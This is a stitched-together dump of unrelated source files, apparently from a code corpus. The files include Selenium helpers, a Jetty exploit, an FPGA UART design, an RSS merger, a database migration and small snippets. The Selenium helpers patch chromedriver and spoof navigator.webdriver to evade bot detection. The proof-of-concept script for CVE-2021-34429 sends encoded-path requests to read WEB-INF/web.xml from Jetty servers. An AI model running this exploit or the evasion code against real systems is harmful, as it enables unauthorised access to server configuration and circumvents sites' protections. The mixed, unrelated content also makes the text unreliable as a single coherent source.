from selenium.webdriver import Chrome, ChromeOptions # TODO: Combine these two dependencies. Leaving it for now since it touches too many sites atm.
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.wait import WebDriverWait
from utils import create_msg
import random, re, requests, string, threading
# https://github.com/Hari-Nagarajan/nvidia-bot/blob/master/utils/selenium_utils.py
options = Options()
options.add_experimental_option(
"excludeSwitches", ["enable-automation", "enable-logging"]
)
options.add_experimental_option("useAutomationExtension", False)
class AnyEc:
"""Use with WebDriverWait to combine expected_conditions
in an OR.
"""
def __init__(self, *args):
self.ecs = args
def __call__(self, driver):
for fn in self.ecs:
try:
if fn(driver):
return True
except:
pass
def no_amazon_image():
prefs = {"profile.managed_default_content_settings.images": 2}
options.add_experimental_option("prefs", prefs)
def yes_amazon_image():
prefs = {"profile.managed_default_content_settings.images": 0}
options.add_experimental_option("prefs", prefs)
def wait_for_element(d, e_id, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
return WebDriverWait(d, time).until(ec.presence_of_element_located((By.ID, e_id)))
def wait_for_element_by_xpath(d, e_path, time=30):
return WebDriverWait(d, time).until(
ec.presence_of_element_located((By.XPATH, e_path))
)
def wait_for_element_by_class(d, e_class, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
return WebDriverWait(d, time).until(
ec.presence_of_element_located((By.CLASS_NAME, e_class))
)
def wait_for_title(d, title, path):
"""
Uses webdriver(d) to navigate to get(path) until it equals title(title)
"""
while d.title != title:
d.get(path)
WebDriverWait(d, 1000)
def wait_for_page(d, title, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
WebDriverWait(d, time).until(ec.title_is(title))
def wait_for_either_title(d, title1, title2, time=30):
"""
Uses webdriver(d) to wait for page title(title1 or title2) to become visible
"""
try:
WebDriverWait(d, time).until(AnyEc(ec.title_is(title1), ec.title_is(title2)))
except Exception:
pass
def wait_for_any_title(d, titles, time=30):
"""
Uses webdriver(d) to wait for page title(any in the list of titles) to become visible
"""
WebDriverWait(d, time).until(AnyEc(*[ec.title_is(title) for title in titles]))
def button_click_using_xpath(d, xpath):
"""
Uses webdriver(d) to click a button using an XPath(xpath)
"""
button_menu = WebDriverWait(d, 10).until(
ec.element_to_be_clickable((By.XPATH, xpath))
)
action = ActionChains(d)
action.move_to_element(button_menu).pause(1).click().perform()
def field_send_keys(d, field, keys):
"""
Uses webdriver(d) to fiend a field(field), clears it and sends keys(keys)
"""
elem = d.find_element_by_name(field)
elem.clear()
elem.send_keys(keys)
def has_class(element, class_name):
classes = element.get_attribute("class")
return class_name in classes
def add_cookies_to_session_from_driver(driver, session):
cookies = driver.get_cookies()
[
session.cookies.set_cookie(
requests.cookies.create_cookie(
domain=cookie["domain"],
name=cookie["name"],
value=cookie["value"],
)
)
for cookie in cookies
]
def enable_headless():
options.add_argument("--headless")
options.add_argument("--no-sandbox")
options.add_argument("--disable-dev-shm-usage")
# https://stackoverflow.com/questions/33225947/can-a-website-detect-when-you-are-using-selenium-with-chromedriver
def change_driver(status_signal, loc):
fin = open(loc, 'rb')
data = fin.read()
val = "$" + "".join(random.choices(string.ascii_lowercase, k=3)) + "_" + \
"".join(random.choices(string.ascii_letters + string.digits, k=22)) + "_"
result = re.search(b"[$][a-z]{3}_[a-zA-Z0-9]{22}_", data)
if result is not None:
status_signal.emit(create_msg("Changing value in Chromedriver", "normal"))
data = data.replace(result.group(0), val.encode())
fin.close()
fin = open(loc, 'wb')
fin.truncate()
fin.write(data)
fin.close()
else:
fin.close()
def open_browser(link, cookies):
threading.Thread(target=start_browser, args=(link, cookies)).start()
def start_browser(link, cookies):
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "eager"
chrome_options = ChromeOptions()
chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"])
chrome_options.add_experimental_option("useAutomationExtension", False)
driver = Chrome(desired_capabilities=caps, executable_path=driver_path, options=chrome_options)
driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument",
{
"source": """
Object.defineProperty(window, 'navigator', {
value: new Proxy(navigator, {
has: (target, key) => (key === 'webdriver' ? false : key in target),
get: (target, key) =>
key === 'webdriver'
? undefined
: typeof target[key] === 'function'
? target[key].bind(target)
: target[key]
})
})
"""
},
)
driver.get(link)
for cookie in cookies:
driver.add_cookie({
"name": cookie["name"],
"value": cookie["value"],
"domain": cookie["domain"]
})
driver.get(link)
| 2.3125 | 2 |
2021/CVE-2021-34429/poc/pocsploit/CVE-2021-34429.py | hjyuan/reapoc | 421 | 12770845 | <reponame>hjyuan/reapoc
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Jetty Authorization Before Parsing and Canonicalization Variation''',
"description": '''For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.''',
"severity": "medium",
"references": [
"https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"cvss-score": "",
"cve-id": "CVE-2021-34429",
"cwe-id": "CWE-200"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "jetty"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/%u002e/WEB-INF/web.xml"""
method = "GET"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/.%00/WEB-INF/web.xml"""
method = "GET"
data = """"""
headers = {}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp1.status_code == 200) and ("""</web-app>""" in resp1.text and """java.sun.com""" in resp1.text) and ("""application/xml""" in str(resp1.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url | 2.578125 | 3 |
feedcollector/rss.py | ctnitschke/feedcollector | 0 | 12770846 | """
Module for handling of RSS (as in Really Simple Syndication
or Rich Site Summary) feeds.
:copyright: (c) 2019 by <NAME>
:license: Apache 2.0, see LICENSE for more details.
"""
from .util import hash_xml_subtree
def merge_feeds(new_root, old_root):
"""
Merge two rss feeds contained in xml.etree.ElementTree.ElementTrees.
Args:
new_root: xml.etree.ElementTree.ElementTree containing the
rss feed considered as new.
old_root: xml.etree.ElementTree.ElementTree containing the
rss feed considered as reference.
Returns:
xml.etree.ElementTree.ElementTree with the merged rss feed,
containing both old and new elements.
"""
old_channel = old_root.find('channel')
new_channel = new_root.find('channel')
# Get guids for items that have it, else build item hash
new_channel_guids = set()
new_channel_hashes = set()
for item in new_channel.findall('item'):
guid = item.find('guid')
if guid is not None:
new_channel_guids.add(guid.text)
else:
digest = hash_xml_subtree(item)
new_channel_hashes.add(digest)
for item in old_channel.findall('item'):
# Check if item guid is present
guid = item.find('guid')
# If the item has a guid...
if guid is not None:
# ...and it is not in the new channel...
if guid.text not in new_channel_guids:
# ... append the item
new_channel.append(item)
# If not...
else:
# hash the damn thing...
old_channel_hash = hash_xml_subtree(item)
# ... and if it's not in our safety net set...
if old_channel_hash not in new_channel_hashes:
# ... add it.
new_channel.append(item)
return new_root
| 2.65625 | 3 |
fv-beginner/ex-08-memory/memtx.py | DonaldKellett/nmigen-beginner | 1 | 12770847 | from nmigen import *
from nmigen.back.pysim import *
from nmigen.asserts import *
from nmigen.test.utils import *
from nmigen.build import *
from nmigen.build import ResourceError
from nmigen.vendor.lattice_ecp5 import *
from nmigen_boards.resources import *
from functools import reduce
from math import ceil, log
import itertools
import os
import subprocess
from txuart import *
__all__ = ['MemTX', 'MemTXDemo', 'VersaECP5Platform']
"""
Transmitting a long message from block RAM
See http://zipcpu.com/tutorial/lsn-08-memory.pdf for more details
"""
class MemTX(Elaboratable):
def __init__(self, fv_mode = False):
self.i_reset = Signal(1, reset=0)
self.o_busy = Signal(1, reset=1)
self.o_uart_tx = Signal(1, reset=1)
self.fv_mode = fv_mode
def ports(self):
return [self.i_reset, self.o_busy, self.o_uart_tx]
def elaborate(self, platform):
m = Module()
psalm_bytes = None
with open('psalm.txt', 'rb') as psalm_file:
psalm_bytes = list(psalm_file.read())
if platform is not None and platform != 'formal':
self.o_uart_tx = platform.request('uart').tx.o
ADDRESS_WIDTH = ceil(log(len(psalm_bytes), 2))
ram = Memory(width=8, depth=1<<ADDRESS_WIDTH, init=psalm_bytes)
m.submodules.rdport = rdport = ram.read_port()
o_addr = Signal(ADDRESS_WIDTH, reset=0)
i_data = Signal(8)
m.d.comb += rdport.addr.eq(o_addr)
m.d.comb += i_data.eq(rdport.data)
o_wr = Signal(1, reset=0)
i_busy = Signal(1, reset=0)
m.submodules.txuart = txuart = TXUART(o_wr, i_data, i_busy, self.o_uart_tx, self.fv_mode)
counter = Signal(2, reset=0)
with m.If(counter == 0):
m.d.sync += o_wr.eq(1)
m.d.sync += counter.eq(1)
with m.Elif(counter == 1):
m.d.sync += o_wr.eq(0)
m.d.sync += counter.eq(2)
with m.Elif(~i_busy):
with m.If(o_addr == len(psalm_bytes) - 1):
m.d.sync += self.o_busy.eq(0)
with m.If(self.i_reset & ~self.o_busy):
m.d.sync += self.o_busy.eq(1)
m.d.sync += o_addr.eq(0)
m.d.sync += counter.eq(0)
with m.Else():
m.d.sync += o_addr.eq(o_addr + 1)
m.d.sync += counter.eq(0)
if self.fv_mode:
"""
Indicator of when Past() is valid
"""
f_past_valid = Signal(1, reset=0)
m.d.sync += f_past_valid.eq(1)
"""
Assumptions on input pins
"""
# i_reset is de-asserted whenever o_busy is asserted
with m.If(self.o_busy):
m.d.comb += Assume(~self.i_reset)
# o_busy is de-asserted for at most 10 consecutive clock cycles before i_reset is asserted
f_past10_valid = Signal(1, reset=0)
f_past10_ctr = Signal(range(10), reset=0)
m.d.sync += f_past10_ctr.eq(f_past10_ctr + 1)
with m.If(f_past10_ctr == 9):
m.d.sync += f_past10_ctr.eq(f_past10_ctr)
m.d.sync += f_past10_valid.eq(1)
with m.If(f_past10_valid & reduce(lambda a, b: a & b, \
(((~Past(self.o_busy, i)) & (~Past(self.i_reset, i))) for i in range(1, 11)))):
m.d.comb += Assume(self.i_reset)
# The initial data in the read port of the block RAM corresponds to address 0x0
with m.If(~f_past_valid):
m.d.comb += Assume(rdport.data == ram[0])
# The data corresponding to the address applied to the read port of the block RAM always
# appears one clock cycle later
with m.If(f_past_valid):
m.d.comb += Assume(rdport.data == ram[Past(rdport.addr)])
# i_busy is initially de-asserted
with m.If(~f_past_valid):
m.d.comb += Assume(~i_busy)
# i_busy is never asserted on its own
with m.If(f_past_valid & (~Past(i_busy)) & ~Past(o_wr)):
m.d.comb += Assume(~i_busy)
# When the transmitter is idle, it responds immediately to write requests
with m.If(f_past_valid & (~Past(i_busy)) & Past(o_wr)):
m.d.comb += Assume(i_busy)
# i_busy is asserted for at most 10 consecutive clock cycles
with m.If(f_past10_valid & reduce(lambda a, b: a & b, \
(Past(i_busy, i) for i in range(1, 11)))):
m.d.comb += Assume(~i_busy)
"""
Properties of o_busy
"""
# o_busy is initially asserted
with m.If(~f_past_valid):
m.d.comb += Assert(self.o_busy)
# o_busy is asserted whenever a transmission is taking place
with m.If((o_addr != len(psalm_bytes) - 1) | (counter < 2) | i_busy):
m.d.comb += Assert(self.o_busy)
# o_busy is de-asserted one clock cycle after the transmission is complete
with m.If(f_past_valid & (Past(o_addr) == len(psalm_bytes) - 1) & (Past(counter) == 2) & \
(~Past(i_busy)) & ~Past(self.i_reset)):
m.d.comb += Assert(~self.o_busy)
"""
Properties of o_addr
"""
# o_addr is initially zero
with m.If(~f_past_valid):
m.d.comb += Assert(o_addr == 0)
# o_addr remains stable during transmission
with m.If(f_past_valid & ((Past(counter) < 2) | Past(i_busy))):
m.d.comb += Assert(Stable(o_addr))
# Except for the last byte, o_addr increments by 1 at the end of each transmission
with m.If(f_past_valid & (Past(o_addr) != len(psalm_bytes) - 1) & (Past(counter) == 2) & \
~Past(i_busy)):
m.d.comb += Assert(o_addr == Past(o_addr) + 1)
# For the last byte, o_addr is set to 0 at the end of the transmission when i_reset is
# asserted
with m.If(f_past_valid & (Past(o_addr) == len(psalm_bytes) - 1) & (Past(counter) == 2) & \
(~Past(i_busy)) & Past(self.i_reset)):
m.d.comb += Assert(o_addr == 0)
"""
Properties of i_data
"""
# Except when counter is zero, i_data should contain the data corresponding to the given
# address
with m.If(counter != 0):
m.d.comb += Assert(i_data == ram[o_addr])
"""
Properties of o_wr
"""
# o_wr is de-asserted whenever i_busy is asserted
with m.If(i_busy):
m.d.comb += Assert(~o_wr)
# o_wr is asserted precisely when counter is 1, and de-asserted otherwise
with m.If(counter == 1):
m.d.comb += Assert(o_wr)
with m.Else():
m.d.comb += Assert(~o_wr)
"""
Properties of counter
"""
# Counter is always counting up when it is less than 2
with m.If(f_past_valid & (Past(counter) < 2)):
m.d.comb += Assert(counter == Past(counter) + 1)
# Counter remains stable at 2 so long as the transmitter is busy
with m.If(f_past_valid & (Past(counter) == 2) & Past(i_busy)):
m.d.comb += Assert(Stable(counter))
# Except for the last byte, counter resets to 0 as soon as the transmitter is idle
with m.If(f_past_valid & (Past(o_addr) != len(psalm_bytes) - 1) & (Past(counter) == 2) & \
~Past(i_busy)):
m.d.comb += Assert(counter == 0)
# For the last byte, counter resets to 0 once transmitter is idle as soon as i_reset is
# asserted
with m.If(f_past_valid & (Past(o_addr) == len(psalm_bytes) - 1) & (Past(counter) == 2) & \
(~Past(i_busy)) & Past(self.i_reset)):
m.d.comb += Assert(counter == 0)
return m
class MemTXDemo(Elaboratable):
"""
Demo driver for MemTX
"""
def elaborate(self, platform):
if platform is None:
raise ValueError('MemTXDemo does not support simulation!')
if platform == 'formal':
raise ValueError('MemTXDemo does not support formal verification!')
m = Module()
m.submodules.memtx = memtx = MemTX()
counter = Signal(30)
m.d.sync += memtx.i_reset.eq(0)
m.d.sync += counter.eq(counter + 1)
with m.If(counter == 0x3FFFFFFF):
m.d.sync += memtx.i_reset.eq(1)
return m
if __name__ == '__main__':
"""
Sanity Check
"""
# class Ctr32(Elaboratable):
# def elaborate(self, platform):
# if platform is None:
# raise ValueError('Ctr32 does not support simulation!')
# if platform == 'formal':
# raise ValueError('Ctr32 does not support formal verification!')
# m = Module()
# ctr = Signal(32, reset=0)
# m.d.sync += ctr.eq(ctr + 1)
# m.d.comb += platform.request('led', 0).o.eq(ctr >= 0x7FFFFFFF)
# m.d.comb += platform.request('led', 1).o.eq(ctr >= 0x7FFFFFFF)
# m.d.comb += platform.request('led', 2).o.eq(ctr >= 0x7FFFFFFF)
# m.d.comb += platform.request('led', 3).o.eq(ctr >= 0x7FFFFFFF)
# m.d.comb += platform.request('led', 4).o.eq(ctr >= 0x7FFFFFFF)
# m.d.comb += platform.request('led', 5).o.eq(ctr >= 0x7FFFFFFF)
# m.d.comb += platform.request('led', 6).o.eq(ctr >= 0x7FFFFFFF)
# m.d.comb += platform.request('led', 7).o.eq(ctr >= 0x7FFFFFFF)
# return m
# VersaECP5Platform().build(Ctr32(), do_program=True)
"""
Simulation
"""
m = Module()
m.submodules.memtx = memtx = MemTX()
sim = Simulator(m)
def process():
for i in range(20000):
yield
sim.add_clock(1e-8)
sim.add_sync_process(process)
with sim.write_vcd('memtx.vcd', 'memtx.gtkw', traces=memtx.ports()):
sim.run()
"""
Formal Verification
"""
class MemTXTest(FHDLTestCase):
def test_memtx(self):
self.assertFormal(MemTX(fv_mode=True), mode='prove', depth=18)
MemTXTest().test_memtx()
"""
Build
"""
VersaECP5Platform().build(MemTXDemo(), do_program=True) | 2.3125 | 2 |
migrations/versions/f0ddbf9cdd26_add_ingredient_availability_table.py | brauls/ingredients-service | 0 | 12770848 | """add ingredient availability table
Revision ID: f0ddbf9cdd26
Revises: 7cf38c4ce08a
Create Date: 2019-06-28 21:34:49.780023
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f0ddbf9cdd26'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('INGREDIENT_AVAILABILITY',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('ingredient_id', sa.Integer(), nullable=False),
sa.Column('month', sa.Integer(), nullable=False),
sa.Column('availability', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['ingredient_id'], ['INGREDIENT.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('INGREDIENT_AVAILABILITY')
# ### end Alembic commands ###
| 1.359375 | 1 |
Leetcode/Sorting,_Binary_Search/1_-_Easy/349._Intersection_of_Two_Arrays.py | Khalid-Sultan/Algorithms-Prep | 1 | 12770849 | <reponame>Khalid-Sultan/Algorithms-Prep
class Solution:
def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:
l = set(nums1)
ret = [i for i in nums2 if i in l]
return list(set(ret)) | 3.796875 | 4 |
misago/misago/core/testproject/searchfilters.py | vascoalramos/misago-deployment | 2 | 12770850 | def test_filter(search):
return search.replace("MMM", "Marines, Marauders and Medics")
| 1.851563 | 2 |